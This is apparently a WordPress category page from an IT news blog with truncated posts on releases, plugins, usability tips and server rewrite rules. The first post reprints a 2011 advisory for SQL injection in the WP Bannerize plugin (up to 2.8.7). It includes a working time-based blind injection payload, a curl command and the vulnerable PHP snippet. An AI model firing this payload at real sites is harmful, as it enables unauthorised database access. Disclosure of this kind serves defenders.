GO IT WORLD | IT TECH | IT NEWS » wordpress

WordPress WP Bannerize plugin <= 2.8.7 SQL Injection Vulnerability

jason — Sun, 02 Oct 2011 11:11:40 +0000

# Exploit Title: WordPress WP Bannerize plugin <= 2.8.7 SQL Injection Vulnerability
# Date: 2011-09-22
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/wp-bannerize.zip
# Version: 2.8.7 (tested)

—————
PoC (POST data)
—————
http://www.site.com/wp-content/plugins/wp-bannerize/ajax_sorter.php
limit=1&offset=1&item[]=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)

e.g.
curl –data "limit=1&offset=1&item[]=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)" -H "X-Requested-With:XMLHttpRequest" http://www.site.com/wp-content/plugins/wp-bannerize/ajax_sorter.php

—————
Vulnerable code
—————
if ( @isset($_SERVER['HTTP_X_REQUESTED_WITH']) ) {
    …
    $limit = intval($_POST['limit']);
    $page_offset = (intval($_POST['offset']) – 1) *

… Read the rest

WordPress 3.1.3 version publish

jason — Sun, 29 May 2011 02:00:49 +0000

WordPress 3.1.3 is available now and is a security update for all previous versions. It contains the following security fixes and enhancements:

Various security hardening by Alexander Concha.
Taxonomy query hardening by John Lamansky.
Prevent sniffing out user names of non-authors by using canonical redirects. Props Verónica Valeros.
Media security fixes by Richard Lundeen of Microsoft, Jesse Ou of Microsoft, and Microsoft Vulnerability Research.
Improves file upload security on hosts with dangerous security settings.
Cleans up old WordPress import files if the import does not finish.
Introduce

… Read the rest

9 ways to make WordPress easier to use for your clients

jason — Fri, 26 Feb 2010 03:52:17 +0000

If you use WordPress as a CMS for your clients’ websites, you’ve probably faced that issue: regular people find WordPress hard to use. Yes, it is quite user-friendly, but apparently not enough for people who double-click on links when browsing or worst, enter their website’s url in Google to get there. To make it easier for these people to maintain their own website, I would suggest the following tips.

1. Install an extended version of TinyMCE

This is one of the first things I realize that the person who will maintain the website is not internet-saavy. To avoid annoying… Read the rest

WordPress Seo Plugin – SEO Smart Links

jason — Thu, 25 Feb 2010 10:09:41 +0000

SEO Smart Links provides automatic SEO benefits for your site in addition to custom keyword lists, nofollow and much more.

SEO Smart Links can automatically link keywords and phrases in your posts and comments with corresponding posts, pages, categories and tags on your blog.

Further SEO Smart links allows you to set up your own keywords and set of matching URLs. Finally SEO Smart links allows you to set nofollow attribute and open links in new window.

It is a perfect solution to get your blog posts interlinked or add affiliate links to other sites.

Everything happens completely transparent, and… Read the rest

mod_rewrite with Fedora 10 and ISPConfig for WordPress

jason — Wed, 24 Feb 2010 11:23:51 +0000

This relates to Fedora 10 and ISPConfig 3.0.1 set up as described in this HowtoForge post One of my colleagues recently got interested in offering our clients WordPress as a content management system, so he’s been trying it out. Yesterday he found out that if he wanted to change the permalink style in WordPress he needed write access to .htaccess, which he didn’t have because the user rights haven’t been set up very well there. So I gave him write access by using

chown daemon:daemon .htaccess

Unfortunately this resulted in a 500 Interal Server Error. Looking at… Read the rest

Please immediately upgrade your wordpress to 2.8.4

jason — Thu, 13 Aug 2009 03:20:05 +0000

A vulnerability was discovered: a specially crafted URL could be requested that would allow an attacker to bypass a security check to verify a user requested a password reset. As a result, the first account without a key in the database (usually the admin account) would have its password reset and a new password would be emailed to the account owner. This doesn’t allow remote access, but it is very annoying.

We fixed this problem last night and have been testing the fixes and looking for other problems since then. Version 2.8.4 which fixes all known problems is now… Read the rest

Nginx rewrite rule for wordpress

jason — Sat, 13 Jun 2009 05:57:43 +0000

If your blog system is wordpress on apache, and you use rewrite rule for it. I’m looking for a way to implement WordPress’s simple htaccess pretty url rules for Nginx.

.htaccess file:
# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress

Fllow is my nginx’s rewrite rule for wordpress:
location / {
index index.php index.html;
if (!-e $request_filename)
{
rewrite ^/(.+)$ /index.php?p=$1 last;
}
}

WordPress 2.8 will be Realeased

jason — Thu, 04 Jun 2009 01:40:10 +0000

I want upgrade to the wordpress relase Beta2 in tommorow. But I found the new version will be released in recent days, so you want to wait a few days.

The release date for WordPress 2.8 has almost been confirmed, according to the latest blog post on the WordPress development blog, the target date for releasing WordPress 2.8 is June 10th.

However this is only a target date and may not end up as being the release date in the end, however it would be good to see it released soon, considering the good number of features it has.… Read the rest

How to Install Google Sitemap XML for WordPress

jason — Mon, 25 May 2009 05:59:06 +0000

I find a plugin of wordpress. This plugin will create a Google sitemaps compliant XML-Sitemap of your WordPress blog. It supports all of the WordPress generated pages as well as custom ones. Everytime you edit or create a post, your sitemap is updated and all major search engines that support the sitemap protocol, like ASK.com, Google, MSN Search and YAHOO, are notified about the update.

Top 10 free wordpress theme sites

jason — Fri, 02 Jan 2009 14:02:02 +0000

Today I will recommend 10 website of providing free wordpress theme for everyone.

WordPress Official Website. There are more than 500 templates,and more than more than 2,136,215 downloads
http://wordpress.org/extend/themes/

There are more than 1000 templates. Here you can find it what you want.
http://www.wpthemes360.com/

There are more than 140 wp templates. The number is not many,but there are many beautiful templates.
http://wordpressthemesbase.com/

There are all kinds of wordpress templates to choose from and they are all for free to download.
Free WordPress Theme Site started in 2008 as a resource… Read the rest